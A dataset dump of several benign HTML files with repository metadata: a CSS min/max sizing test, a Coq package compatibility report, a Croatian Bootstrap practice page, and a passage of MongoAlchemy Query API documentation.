text
stringlengths
2
1.05M
repo_name
stringlengths
5
101
path
stringlengths
4
991
language
stringclasses
3 values
license
stringclasses
5 values
size
int64
2
1.05M
<!DOCTYPE html> <html> <head></head> <body style="font:12px Consolas; margin:0;"> <div id="p1" style="background:gold; width:50px; height:50px; min-width:100px; min-height:100px; padding:10px;"> <div id="c1" style="width:100%; height:100%; background:plum;"></div> </div> <br> <div id="p2" style="background:gold; width:150px; height:150px; max-width:100px; max-height:100px; padding:10px;"> <div id="c2" style="width:100%; height:100%; background:plum;"></div> </div> </body> </html>
dota8/dota8.github.io
tests/RD1024/static_min_max_height.html
HTML
mit
522
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>subst: Not compatible</title> <link rel="shortcut icon" type="image/png" href="../../../../../favicon.png" /> <link href="../../../../../bootstrap.min.css" rel="stylesheet"> <link href="../../../../../bootstrap-custom.css" rel="stylesheet"> <link href="//maxcdn.bootstrapcdn.com/font-awesome/4.2.0/css/font-awesome.min.css" rel="stylesheet"> <script src="../../../../../moment.min.js"></script> <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries --> <!-- WARNING: Respond.js doesn't work if you view the page via file:// --> <!--[if lt IE 9]> <script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script> <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script> <![endif]--> </head> <body> <div class="container"> <div class="navbar navbar-default" role="navigation"> <div class="container-fluid"> <div class="navbar-header"> <a class="navbar-brand" href="../../../../.."><i class="fa fa-lg fa-flag-checkered"></i> Coq bench</a> </div> <div id="navbar" class="collapse navbar-collapse"> <ul class="nav navbar-nav"> <li><a href="../..">clean / released</a></li> <li class="active"><a href="">8.11.1 / subst - 8.7.0</a></li> </ul> </div> </div> </div> <div class="article"> <div class="row"> <div class="col-md-12"> <a href="../..">« Up</a> <h1> subst <small> 8.7.0 <span class="label label-info">Not compatible</span> </small> </h1> <p><em><script>document.write(moment("2021-04-12 22:56:58 +0000", "YYYY-MM-DD HH:mm:ss Z").fromNow());</script> (2021-04-12 22:56:58 UTC)</em><p> <h2>Context</h2> <pre># Packages matching: installed # Name # Installed # Synopsis base-bigarray base base-threads base base-unix base conf-findutils 1 Virtual package relying on findutils coq 8.11.1 Formal proof management system num 1.4 The legacy Num library for arbitrary-precision integer and rational arithmetic ocaml 4.10.1 The OCaml compiler (virtual package) ocaml-base-compiler 4.10.1 Official release 4.10.1 ocaml-config 1 OCaml Switch Configuration ocamlfind 1.9.1 A library manager for OCaml # opam file: opam-version: &quot;2.0&quot; maintainer: &quot;Hugo.Herbelin@inria.fr&quot; homepage: &quot;https://github.com/coq-contribs/subst&quot; license: &quot;Unknown&quot; build: [make &quot;-j%{jobs}%&quot;] install: [make &quot;install&quot;] remove: [&quot;rm&quot; &quot;-R&quot; &quot;%{lib}%/coq/user-contrib/Subst&quot;] depends: [ &quot;ocaml&quot; &quot;coq&quot; {&gt;= &quot;8.7&quot; &amp; &lt; &quot;8.8~&quot;} ] tags: [ &quot;keyword: lambda-sigma-lift-calculus&quot; &quot;keyword: explicit substitution&quot; &quot;keyword: Newman&#39;s lemma&quot; &quot;keyword: Yokouchi&#39;s lemma&quot; &quot;keyword: confluence&quot; &quot;keyword: rewriting&quot; &quot;category: Computer Science/Lambda Calculi&quot; ] authors: [ &quot;Amokrane Saïbi&quot; ] bug-reports: &quot;https://github.com/coq-contribs/subst/issues&quot; dev-repo: &quot;git+https://github.com/coq-contribs/subst.git&quot; synopsis: &quot;The confluence of Hardin-Lévy lambda-sigma-lift-calcul&quot; description: &quot;&quot;&quot; The confluence of Hardin-Lévy lambda-sigma-lift-calcul is proven. By the way, several standard definition and results about rewriting systems are proven (Newman&#39;s lemma, Yokouchi&#39;s lemma, ...).&quot;&quot;&quot; flags: light-uninstall url { src: &quot;https://github.com/coq-contribs/subst/archive/v8.7.0.tar.gz&quot; checksum: &quot;md5=55a737d8d86b32bbcd34ea1e7994e224&quot; } </pre> <h2>Lint</h2> <dl class="dl-horizontal"> <dt>Command</dt> <dd><code>true</code></dd> <dt>Return code</dt> <dd>0</dd> </dl> <h2>Dry install</h2> <p>Dry install with the current Coq version:</p> <dl class="dl-horizontal"> <dt>Command</dt> <dd><code>opam install -y --show-action coq-subst.8.7.0 coq.8.11.1</code></dd> <dt>Return code</dt> <dd>5120</dd> <dt>Output</dt> <dd><pre>[NOTE] Package coq is already installed (current version is 8.11.1). The following dependencies couldn&#39;t be met: - coq-subst -&gt; coq &lt; 8.8~ -&gt; ocaml &lt; 4.10 base of this switch (use `--unlock-base&#39; to force) No solution found, exiting </pre></dd> </dl> <p>Dry install without Coq/switch base, to test if the problem was incompatibility with the current Coq/OCaml version:</p> <dl class="dl-horizontal"> <dt>Command</dt> <dd><code>opam remove -y coq; opam install -y --show-action --unlock-base coq-subst.8.7.0</code></dd> <dt>Return code</dt> <dd>0</dd> </dl> <h2>Install dependencies</h2> <dl class="dl-horizontal"> <dt>Command</dt> <dd><code>true</code></dd> <dt>Return code</dt> <dd>0</dd> <dt>Duration</dt> <dd>0 s</dd> </dl> <h2>Install</h2> <dl class="dl-horizontal"> <dt>Command</dt> <dd><code>true</code></dd> <dt>Return code</dt> <dd>0</dd> <dt>Duration</dt> <dd>0 s</dd> </dl> <h2>Installation size</h2> <p>No files were installed.</p> <h2>Uninstall</h2> <dl class="dl-horizontal"> <dt>Command</dt> <dd><code>true</code></dd> <dt>Return code</dt> <dd>0</dd> <dt>Missing removes</dt> <dd> none </dd> <dt>Wrong removes</dt> <dd> none </dd> </dl> </div> </div> </div> <hr/> <div class="footer"> <p class="text-center"> <small>Sources are on <a href="https://github.com/coq-bench">GitHub</a>. © Guillaume Claret.</small> </p> </div> </div> <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js"></script> <script src="../../../../../bootstrap.min.js"></script> </body> </html>
coq-bench/coq-bench.github.io
clean/Linux-x86_64-4.10.1-2.0.6/released/8.11.1/subst/8.7.0.html
HTML
mit
6,920
<!DOCTYPE html> <html> <head> <title>movies of the 80's</title> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous"> <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap-theme.min.css" integrity="sha384-rHyoN1iRsVXV4nD0JutlnGaslCJuC7uwjduW9SVrLvRYooPp2bWYgmgJQIXwl/Sp" crossorigin="anonymous"> <style> body { background-color: black; background-image: url(action.jpg); background-position-x: center; background-position-y: bottom; background-repeat: no-repeat; background-attachment: scroll; -webkit-background-size: cover; -moz-background-size: cover; -o-background-size: cover; background-size: cover;} .list-group {float: left; margin-left: 15px} footer {text-align: center;} .ulclass { position: relative; display: block; padding-top: 100px; padding-right: 40px; padding-bottom: 30px; padding-left:22px; margin-bottom: -1px; height:30px; background-color: #222; border-color: #080808;} .korisni {height: 600px; background-color: #222; float: left; margin-top: -20px; position: relative; } .vertical-menu { width: 200px; } .vertical-menu a { background-color: #222; color: #eee; display: block; padding: 12px; text-decoration: none; } .vertical-menu a:hover { background-color: #ccc; color: #222; } .signup {padding-left: 10px; padding-top: 20px; color: #eee; } .link0 {padding-top: 20px;} .registracija {font-size: 78%;} .textarea { padding-left: 10px !important; padding-top: 12px !important; color: #eee; } .textarea2{ color: black !important } .input { transition: font-size 0.3s; font-size: 14px; } .input:hover { font-size: 14.9px; } </style> </head> <body> <header> <nav class="navbar navbar-inverse"> <div class="container-fluid"> <!-- Brand and toggle get grouped for better mobile display --> <div class="navbar-header"> <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1" aria-expanded="false"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="navbar-brand" href="Index.html">Početna stranica</a> </div> <!-- Collect the nav links, forms, and other content for toggling --> <div class="collapse navbar-collapse" id="bs-example-navbar-collapse-1"> <ul class="nav navbar-nav"> <li><a href="#">Nekakav link <span class="sr-only">(current)</span></a></li> <li><a href="#">Nekakav link 2</a></li> <li><a href="#">Nekakav link 3</a></li> <li class="dropdown"> <a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false">Drop menu za neke potrebe <span class="caret"></span></a> <ul class="dropdown-menu"> <li><a href="#">Action</a></li> <li><a href="#">Another action</a></li> <li><a href="#">Something else here</a></li> <li role="separator" class="divider"></li> <li><a href="#">Separated link</a></li> <li role="separator" class="divider"></li> <li><a href="#">One more separated link</a></li> </ul> </li> </ul> <form class="navbar-form navbar-right"> <div class="form-group"> <input type="text" class="form-control" placeholder="Upiši pretragu"> </div> <button type="submit" class="btn btn-default">Traži</button> </form> </div><!-- /.navbar-collapse --> </div><!-- /.container-fluid --> </nav> </header> <div class="korisni"> <div class="vertical-menu"> <form class="signup"> <div>PRIJAVA</div> <br> Korisnicko ime:<br> <input type="text" name="username" style="color: black !important"><br><br> Lozinka:<br> <input type="password" name="password" style="color: black !important"><br><br> <button type="submit" style="color:#222;">Prijavi se</button><button type="submit" style="color:#222;">Registracija</button><br> </form> <div class="link0"><a href="#">Link 0</a></div> <a href="#">Link 1</a> <a href="#">Link 2</a> <a href="#">Link 3</a> </div> <div class="textarea"><form>Unesite neki sadržaj:<br> <textarea class="textarea2" rows="5"></textarea><br> <input type="submit" value="Stisni" style="color:black !important"> </form> </div> </div> <footer> <nav class="navbar-fixed-bottom"> <div class="container" style="color: white !important"> <p>Ovo je jedan obični footer, a <a href="#">ovdje</a> kliknite za početnu stranicu 2017</p> </div> </nav> </footer> </body> </html>
algebrateam/phpdev2017
gtolusic/bootstrap_zadaca.html
HTML
mit
5,158
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Query Objects &mdash; MongoAlchemy v0.8 documentation</title> <link rel="stylesheet" href="../../_static/default.css" type="text/css" /> <link rel="stylesheet" href="../../_static/pygments.css" type="text/css" /> <script type="text/javascript"> var DOCUMENTATION_OPTIONS = { URL_ROOT: '../../', VERSION: '0.8', COLLAPSE_INDEX: false, FILE_SUFFIX: '.html', HAS_SOURCE: true }; </script> <script type="text/javascript" src="../../_static/jquery.js"></script> <script type="text/javascript" src="../../_static/underscore.js"></script> <script type="text/javascript" src="../../_static/doctools.js"></script> <link rel="top" title="MongoAlchemy v0.8 documentation" href="../../index.html" /> <link rel="up" title="Expression Language — Querying and Updating" href="index.html" /> <link rel="next" title="Mongo Query Expression Language" href="query_expressions.html" /> <link rel="prev" title="Expression Language — Querying and Updating" href="index.html" /> </head> <body> <div class="related"> <h3>Navigation</h3> <ul> <li class="right" style="margin-right: 10px"> <a href="../../genindex.html" title="General Index" accesskey="I">index</a></li> <li class="right" > <a href="../../py-modindex.html" title="Python Module Index" >modules</a> |</li> <li class="right" > <a href="query_expressions.html" title="Mongo Query Expression Language" accesskey="N">next</a> |</li> <li class="right" > <a href="index.html" title="Expression Language — Querying and Updating" accesskey="P">previous</a> |</li> <li><a href="../../index.html">MongoAlchemy v0.8 documentation</a> &raquo;</li> <li><a href="../index.html" >API documentation</a> &raquo;</li> <li><a href="index.html" accesskey="U">Expression Language — Querying and Updating</a> &raquo;</li> </ul> </div> <div class="document"> <div class="documentwrapper"> <div class="bodywrapper"> <div class="body"> <div class="section" id="query-objects"> <h1>Query Objects<a class="headerlink" href="#query-objects" title="Permalink to this headline">¶</a></h1> <dl class="class"> <dt id="mongoalchemy.query.Query"> <em class="property">class </em><tt class="descclassname">mongoalchemy.query.</tt><tt class="descname">Query</tt><big>(</big><em>type</em>, <em>session</em><big>)</big><a class="headerlink" href="#mongoalchemy.query.Query" title="Permalink to this definition">¶</a></dt> <dd><p>A query object has all of the methods necessary to programmatically generate a mongo query as well as methods to retrieve results of the query or do an update based on it.</p> <p>In general a query object should be created via <tt class="docutils literal"><span class="pre">Session.query</span></tt>, not directly.</p> <table class="docutils field-list" frame="void" rules="none"> <col class="field-name" /> <col class="field-body" /> <tbody valign="top"> <tr class="field"><th class="field-name">Parameters:</th><td class="field-body"><ul class="first last simple"> <li><strong>type</strong> &#8211; A subclass of class:<cite>mongoalchemy.document.Document</cite></li> <li><strong>db</strong> &#8211; The <a class="reference internal" href="../session.html#mongoalchemy.session.Session" title="mongoalchemy.session.Session"><tt class="xref py py-class docutils literal"><span class="pre">Session</span></tt></a> which this query is associated with.</li> </ul> </td> </tr> </tbody> </table> <dl class="method"> <dt id="mongoalchemy.query.Query.resolve_name"> <tt class="descname">resolve_name</tt><big>(</big><em>name</em><big>)</big><a class="headerlink" href="#mongoalchemy.query.Query.resolve_name" title="Permalink to this definition">¶</a></dt> <dd></dd></dl> <dl class="attribute"> <dt id="mongoalchemy.query.Query.query"> <tt class="descname">query</tt><a class="headerlink" href="#mongoalchemy.query.Query.query" title="Permalink to this definition">¶</a></dt> <dd></dd></dl> <dl class="method"> <dt id="mongoalchemy.query.Query.raw_output"> <tt class="descname">raw_output</tt><big>(</big><big>)</big><a class="headerlink" href="#mongoalchemy.query.Query.raw_output" title="Permalink to this definition">¶</a></dt> <dd></dd></dl> <dl class="method"> <dt id="mongoalchemy.query.Query.get_fields"> <tt class="descname">get_fields</tt><big>(</big><big>)</big><a class="headerlink" href="#mongoalchemy.query.Query.get_fields" title="Permalink to this definition">¶</a></dt> <dd></dd></dl> <dl class="method"> <dt id="mongoalchemy.query.Query.get_limit"> <tt class="descname">get_limit</tt><big>(</big><big>)</big><a class="headerlink" href="#mongoalchemy.query.Query.get_limit" title="Permalink to this definition">¶</a></dt> <dd></dd></dl> <dl class="method"> <dt id="mongoalchemy.query.Query.get_skip"> <tt class="descname">get_skip</tt><big>(</big><big>)</big><a class="headerlink" href="#mongoalchemy.query.Query.get_skip" title="Permalink to this definition">¶</a></dt> <dd></dd></dl> <dl class="method"> <dt id="mongoalchemy.query.Query.limit"> <tt class="descname">limit</tt><big>(</big><em>limit</em><big>)</big><a class="headerlink" href="#mongoalchemy.query.Query.limit" title="Permalink to this definition">¶</a></dt> <dd><p>Sets the limit on the number of documents returned</p> <table class="docutils field-list" frame="void" rules="none"> <col class="field-name" /> <col class="field-body" /> <tbody valign="top"> <tr class="field"><th class="field-name">Parameters:</th><td class="field-body"><strong>limit</strong> &#8211; the number of documents to return</td> </tr> </tbody> </table> </dd></dl> <dl class="method"> <dt id="mongoalchemy.query.Query.skip"> <tt class="descname">skip</tt><big>(</big><em>skip</em><big>)</big><a class="headerlink" href="#mongoalchemy.query.Query.skip" title="Permalink to this definition">¶</a></dt> <dd><p>Sets the number of documents to skip in the result</p> <table class="docutils field-list" frame="void" rules="none"> <col class="field-name" /> <col class="field-body" /> <tbody valign="top"> <tr class="field"><th class="field-name">Parameters:</th><td class="field-body"><strong>skip</strong> &#8211; the number of documents to skip</td> </tr> </tbody> </table> </dd></dl> <dl class="method"> <dt id="mongoalchemy.query.Query.clone"> <tt class="descname">clone</tt><big>(</big><big>)</big><a class="headerlink" href="#mongoalchemy.query.Query.clone" title="Permalink to this definition">¶</a></dt> <dd><p>Creates a clone of the current query and all settings. Further updates to the cloned object or the original object will not affect each other</p> </dd></dl> <dl class="method"> <dt id="mongoalchemy.query.Query.one"> <tt class="descname">one</tt><big>(</big><big>)</big><a class="headerlink" href="#mongoalchemy.query.Query.one" title="Permalink to this definition">¶</a></dt> <dd><p>Execute the query and return one result. If more than one result is returned, raises a <tt class="docutils literal"><span class="pre">BadResultException</span></tt></p> </dd></dl> <dl class="method"> <dt id="mongoalchemy.query.Query.first"> <tt class="descname">first</tt><big>(</big><big>)</big><a class="headerlink" href="#mongoalchemy.query.Query.first" title="Permalink to this definition">¶</a></dt> <dd><p>Execute the query and return the first result. Unlike <tt class="docutils literal"><span class="pre">one</span></tt>, if there are multiple documents it simply returns the first one. If there are no documents, first returns <tt class="xref docutils literal"><span class="pre">None</span></tt></p> </dd></dl> <dl class="method"> <dt id="mongoalchemy.query.Query.hint_asc"> <tt class="descname">hint_asc</tt><big>(</big><em>qfield</em><big>)</big><a class="headerlink" href="#mongoalchemy.query.Query.hint_asc" title="Permalink to this definition">¶</a></dt> <dd><p>Applies a hint for the query that it should use a (<tt class="docutils literal"><span class="pre">qfield</span></tt>, ASCENDING) index when performing the query.</p> <table class="docutils field-list" frame="void" rules="none"> <col class="field-name" /> <col class="field-body" /> <tbody valign="top"> <tr class="field"><th class="field-name">Parameters:</th><td class="field-body"><strong>qfield</strong> &#8211; the instance of <tt class="xref py py-class docutils literal"><span class="pre">mongoalchemy.QueryField</span></tt> to use as the key.</td> </tr> </tbody> </table> </dd></dl> <dl class="method"> <dt id="mongoalchemy.query.Query.hint_desc"> <tt class="descname">hint_desc</tt><big>(</big><em>qfield</em><big>)</big><a class="headerlink" href="#mongoalchemy.query.Query.hint_desc" title="Permalink to this definition">¶</a></dt> <dd><p>Applies a hint for the query that it should use a (<tt class="docutils literal"><span class="pre">qfield</span></tt>, DESCENDING) index when performing the query.</p> <table class="docutils field-list" frame="void" rules="none"> <col class="field-name" /> <col class="field-body" /> <tbody valign="top"> <tr class="field"><th class="field-name">Parameters:</th><td class="field-body"><strong>qfield</strong> &#8211; the instance of <tt class="xref py py-class docutils literal"><span class="pre">mongoalchemy.QueryField</span></tt> to use as the key.</td> </tr> </tbody> </table> </dd></dl> <dl class="method"> <dt id="mongoalchemy.query.Query.explain"> <tt class="descname">explain</tt><big>(</big><big>)</big><a class="headerlink" href="#mongoalchemy.query.Query.explain" title="Permalink to this definition">¶</a></dt> <dd><p>Executes an explain operation on the database for the current query and returns the raw explain object returned.</p> </dd></dl> <dl class="method"> <dt id="mongoalchemy.query.Query.all"> <tt class="descname">all</tt><big>(</big><big>)</big><a class="headerlink" href="#mongoalchemy.query.Query.all" title="Permalink to this definition">¶</a></dt> <dd><p>Return all of the results of a query in a list</p> </dd></dl> <dl class="method"> <dt id="mongoalchemy.query.Query.distinct"> <tt class="descname">distinct</tt><big>(</big><em>key</em><big>)</big><a class="headerlink" href="#mongoalchemy.query.Query.distinct" title="Permalink to this definition">¶</a></dt> <dd><p>Execute this query and return all of the unique values of <tt class="docutils literal"><span class="pre">key</span></tt>.</p> <table class="docutils field-list" frame="void" rules="none"> <col class="field-name" /> <col class="field-body" /> <tbody valign="top"> <tr class="field"><th class="field-name">Parameters:</th><td class="field-body"><strong>key</strong> &#8211; the instance of <tt class="xref py py-class docutils literal"><span class="pre">mongoalchemy.QueryField</span></tt> to use as the distinct key.</td> </tr> </tbody> </table> </dd></dl> <dl class="method"> <dt id="mongoalchemy.query.Query.filter"> <tt class="descname">filter</tt><big>(</big><em>*query_expressions</em><big>)</big><a class="headerlink" href="#mongoalchemy.query.Query.filter" title="Permalink to this definition">¶</a></dt> <dd><p>Apply the given query expressions to this query object</p> <p><strong>Example</strong>: <tt class="docutils literal"><span class="pre">s.query(SomeObj).filter(SomeObj.age</span> <span class="pre">&gt;</span> <span class="pre">10,</span> <span class="pre">SomeObj.blood_type</span> <span class="pre">==</span> <span class="pre">'O')</span></tt></p> <table class="docutils field-list" frame="void" rules="none"> <col class="field-name" /> <col class="field-body" /> <tbody valign="top"> <tr class="field"><th class="field-name">Parameters:</th><td class="field-body"><strong>query_expressions</strong> &#8211; Instances of <a class="reference internal" href="query_expressions.html#mongoalchemy.query_expression.QueryExpression" title="mongoalchemy.query_expression.QueryExpression"><tt class="xref py py-class docutils literal"><span class="pre">mongoalchemy.query_expression.QueryExpression</span></tt></a></td> </tr> </tbody> </table> <div class="admonition-see-also admonition seealso"> <p class="first admonition-title">See also</p> <p class="last"><a class="reference internal" href="query_expressions.html#mongoalchemy.query_expression.QueryExpression" title="mongoalchemy.query_expression.QueryExpression"><tt class="xref py py-class docutils literal"><span class="pre">QueryExpression</span></tt></a> class</p> </div> </dd></dl> <dl class="method"> <dt id="mongoalchemy.query.Query.filter_by"> <tt class="descname">filter_by</tt><big>(</big><em>**filters</em><big>)</big><a class="headerlink" href="#mongoalchemy.query.Query.filter_by" title="Permalink to this definition">¶</a></dt> <dd><p>Filter for the names in <tt class="docutils literal"><span class="pre">filters</span></tt> being equal to the associated values. Cannot be used for sub-objects since keys must be strings</p> </dd></dl> <dl class="method"> <dt id="mongoalchemy.query.Query.count"> <tt class="descname">count</tt><big>(</big><em>with_limit_and_skip=False</em><big>)</big><a class="headerlink" href="#mongoalchemy.query.Query.count" title="Permalink to this definition">¶</a></dt> <dd><p>Execute a count on the number of results this query would return.</p> <table class="docutils field-list" frame="void" rules="none"> <col class="field-name" /> <col class="field-body" /> <tbody valign="top"> <tr class="field"><th class="field-name">Parameters:</th><td class="field-body"><strong>with_limit_and_skip</strong> &#8211; Include <tt class="docutils literal"><span class="pre">.limit()</span></tt> and <tt class="docutils literal"><span class="pre">.skip()</span></tt> arguments in the count?</td> </tr> </tbody> </table> </dd></dl> <dl class="method"> <dt id="mongoalchemy.query.Query.fields"> <tt class="descname">fields</tt><big>(</big><em>*fields</em><big>)</big><a class="headerlink" href="#mongoalchemy.query.Query.fields" title="Permalink to this definition">¶</a></dt> <dd><p>Only return the specified fields from the object. Accessing a field that was not specified in <tt class="docutils literal"><span class="pre">fields</span></tt> will result in a :class:<tt class="docutils literal"><span class="pre">mongoalchemy.document.FieldNotRetrieved</span></tt> exception being raised</p> <table class="docutils field-list" frame="void" rules="none"> <col class="field-name" /> <col class="field-body" /> <tbody valign="top"> <tr class="field"><th class="field-name">Parameters:</th><td class="field-body"><strong>fields</strong> &#8211; Instances of :class:<tt class="docutils literal"><span class="pre">mongoalchemy.query.QueryField</span></tt> specifying which fields to return</td> </tr> </tbody> </table> </dd></dl> <dl class="method"> <dt id="mongoalchemy.query.Query.ascending"> <tt class="descname">ascending</tt><big>(</big><em>qfield</em><big>)</big><a class="headerlink" href="#mongoalchemy.query.Query.ascending" title="Permalink to this definition">¶</a></dt> <dd><p>Sort the result based on <tt class="docutils literal"><span class="pre">qfield</span></tt> in ascending order. These calls can be chained to sort by multiple fields.</p> <table class="docutils field-list" frame="void" rules="none"> <col class="field-name" /> <col class="field-body" /> <tbody valign="top"> <tr class="field"><th class="field-name">Parameters:</th><td class="field-body"><strong>qfield</strong> &#8211; Instance of :class:<tt class="docutils literal"><span class="pre">mongoalchemy.query.QueryField</span></tt> specifying which field to sort by.</td> </tr> </tbody> </table> </dd></dl> <dl class="method"> <dt id="mongoalchemy.query.Query.descending"> <tt class="descname">descending</tt><big>(</big><em>qfield</em><big>)</big><a class="headerlink" href="#mongoalchemy.query.Query.descending" title="Permalink to this definition">¶</a></dt> <dd><p>Sort the result based on <tt class="docutils literal"><span class="pre">qfield</span></tt> in ascending order. These calls can be chained to sort by multiple fields.</p> <table class="docutils field-list" frame="void" rules="none"> <col class="field-name" /> <col class="field-body" /> <tbody valign="top"> <tr class="field"><th class="field-name">Parameters:</th><td class="field-body"><strong>qfield</strong> &#8211; Instance of :class:<tt class="docutils literal"><span class="pre">mongoalchemy.query.QueryField</span></tt> specifying which field to sort by.</td> </tr> </tbody> </table> </dd></dl> <dl class="method"> <dt id="mongoalchemy.query.Query.not_"> <tt class="descname">not_</tt><big>(</big><em>*query_expressions</em><big>)</big><a class="headerlink" href="#mongoalchemy.query.Query.not_" title="Permalink to this definition">¶</a></dt> <dd><p>Add a $not expression to the query, negating the query expressions given.</p> <p><strong>Examples</strong>: <tt class="docutils literal"><span class="pre">query.not_(SomeDocClass.age</span> <span class="pre">&lt;=</span> <span class="pre">18)</span></tt> becomes <tt class="docutils literal"><span class="pre">{'age'</span> <span class="pre">:</span> <span class="pre">{</span> <span class="pre">'$not'</span> <span class="pre">:</span> <span class="pre">{</span> <span class="pre">'$gt'</span> <span class="pre">:</span> <span class="pre">18</span> <span class="pre">}</span> <span class="pre">}}</span></tt></p> <table class="docutils field-list" frame="void" rules="none"> <col class="field-name" /> <col class="field-body" /> <tbody valign="top"> <tr class="field"><th class="field-name">Parameters:</th><td class="field-body"><strong>query_expressions</strong> &#8211; Instances of <a class="reference internal" href="query_expressions.html#mongoalchemy.query_expression.QueryExpression" title="mongoalchemy.query_expression.QueryExpression"><tt class="xref py py-class docutils literal"><span class="pre">mongoalchemy.query_expression.QueryExpression</span></tt></a></td> </tr> </tbody> </table> </dd></dl> <dl class="method"> <dt id="mongoalchemy.query.Query.or_"> <tt class="descname">or_</tt><big>(</big><em>first_qe</em>, <em>*qes</em><big>)</big><a class="headerlink" href="#mongoalchemy.query.Query.or_" title="Permalink to this definition">¶</a></dt> <dd><p>Add a $not expression to the query, negating the query expressions given. The <tt class="docutils literal"><span class="pre">|</span> <span class="pre">operator</span></tt> on query expressions does the same thing</p> <p><strong>Examples</strong>: <tt class="docutils literal"><span class="pre">query.or_(SomeDocClass.age</span> <span class="pre">==</span> <span class="pre">18,</span> <span class="pre">SomeDocClass.age</span> <span class="pre">==</span> <span class="pre">17)</span></tt> becomes <tt class="docutils literal"><span class="pre">{'$or'</span> <span class="pre">:</span> <span class="pre">[{</span> <span class="pre">'age'</span> <span class="pre">:</span> <span class="pre">18</span> <span class="pre">},</span> <span class="pre">{</span> <span class="pre">'age'</span> <span class="pre">:</span> <span class="pre">17</span> <span class="pre">}]}</span></tt></p> <table class="docutils field-list" frame="void" rules="none"> <col class="field-name" /> <col class="field-body" /> <tbody valign="top"> <tr class="field"><th class="field-name">Parameters:</th><td class="field-body"><strong>query_expressions</strong> &#8211; Instances of <a class="reference internal" href="query_expressions.html#mongoalchemy.query_expression.QueryExpression" title="mongoalchemy.query_expression.QueryExpression"><tt class="xref py py-class docutils literal"><span class="pre">mongoalchemy.query_expression.QueryExpression</span></tt></a></td> </tr> </tbody> </table> </dd></dl> <dl class="method"> <dt id="mongoalchemy.query.Query.in_"> <tt class="descname">in_</tt><big>(</big><em>qfield</em>, <em>*values</em><big>)</big><a class="headerlink" href="#mongoalchemy.query.Query.in_" title="Permalink to this definition">¶</a></dt> <dd><p>Check to see that the value of <tt class="docutils literal"><span class="pre">qfield</span></tt> is one of <tt class="docutils literal"><span class="pre">values</span></tt></p> <table class="docutils field-list" frame="void" rules="none"> <col class="field-name" /> <col class="field-body" /> <tbody valign="top"> <tr class="field"><th class="field-name">Parameters:</th><td class="field-body"><ul class="first last simple"> <li><strong>qfield</strong> &#8211; Instances of <a class="reference internal" href="query_expressions.html#mongoalchemy.query_expression.QueryExpression" title="mongoalchemy.query_expression.QueryExpression"><tt class="xref py py-class docutils literal"><span class="pre">mongoalchemy.query_expression.QueryExpression</span></tt></a></li> <li><strong>values</strong> &#8211; Values should be python values which <tt class="docutils literal"><span class="pre">qfield</span></tt> understands</li> </ul> </td> </tr> </tbody> </table> </dd></dl> <dl class="method"> <dt id="mongoalchemy.query.Query.nin"> <tt class="descname">nin</tt><big>(</big><em>qfield</em>, <em>*values</em><big>)</big><a class="headerlink" href="#mongoalchemy.query.Query.nin" title="Permalink to this definition">¶</a></dt> <dd><p>Check to see that the value of <tt class="docutils literal"><span class="pre">qfield</span></tt> is not one of <tt class="docutils literal"><span class="pre">values</span></tt></p> <table class="docutils field-list" frame="void" rules="none"> <col class="field-name" /> <col class="field-body" /> <tbody valign="top"> <tr class="field"><th class="field-name">Parameters:</th><td class="field-body"><ul class="first last simple"> <li><strong>qfield</strong> &#8211; Instances of <a class="reference internal" href="query_expressions.html#mongoalchemy.query_expression.QueryExpression" title="mongoalchemy.query_expression.QueryExpression"><tt class="xref py py-class docutils literal"><span class="pre">mongoalchemy.query_expression.QueryExpression</span></tt></a></li> <li><strong>values</strong> &#8211; Values should be python values which <tt class="docutils literal"><span class="pre">qfield</span></tt> understands</li> </ul> </td> </tr> </tbody> </table> </dd></dl> <dl class="method"> <dt id="mongoalchemy.query.Query.find_and_modify"> <tt class="descname">find_and_modify</tt><big>(</big><em>new=False</em>, <em>remove=False</em><big>)</big><a class="headerlink" href="#mongoalchemy.query.Query.find_and_modify" title="Permalink to this definition">¶</a></dt> <dd><p>The mongo &#8220;find and modify&#8221; command. Behaves like an update expression in that &#8220;execute&#8221; must be called to do the update and return the results.</p> <table class="docutils field-list" frame="void" rules="none"> <col class="field-name" /> <col class="field-body" /> <tbody valign="top"> <tr class="field"><th class="field-name">Parameters:</th><td class="field-body"><ul class="first last simple"> <li><strong>new</strong> &#8211; Whether to return the new object or old (default: False)</li> <li><strong>remove</strong> &#8211; Whether to remove the object before returning it</li> </ul> </td> </tr> </tbody> </table> </dd></dl> <dl class="method"> <dt id="mongoalchemy.query.Query.set"> <tt class="descname">set</tt><big>(</big><em>*args</em>, <em>**kwargs</em><big>)</big><a class="headerlink" href="#mongoalchemy.query.Query.set" title="Permalink to this definition">¶</a></dt> <dd><p>Refer to: <a class="reference internal" href="update_expressions.html#mongoalchemy.update_expression.UpdateExpression.set" title="mongoalchemy.update_expression.UpdateExpression.set"><tt class="xref py py-func docutils literal"><span class="pre">set()</span></tt></a></p> </dd></dl> <dl class="method"> <dt id="mongoalchemy.query.Query.unset"> <tt class="descname">unset</tt><big>(</big><em>qfield</em><big>)</big><a class="headerlink" href="#mongoalchemy.query.Query.unset" title="Permalink to this definition">¶</a></dt> <dd><p>Refer to: <a class="reference internal" href="update_expressions.html#mongoalchemy.update_expression.UpdateExpression.unset" 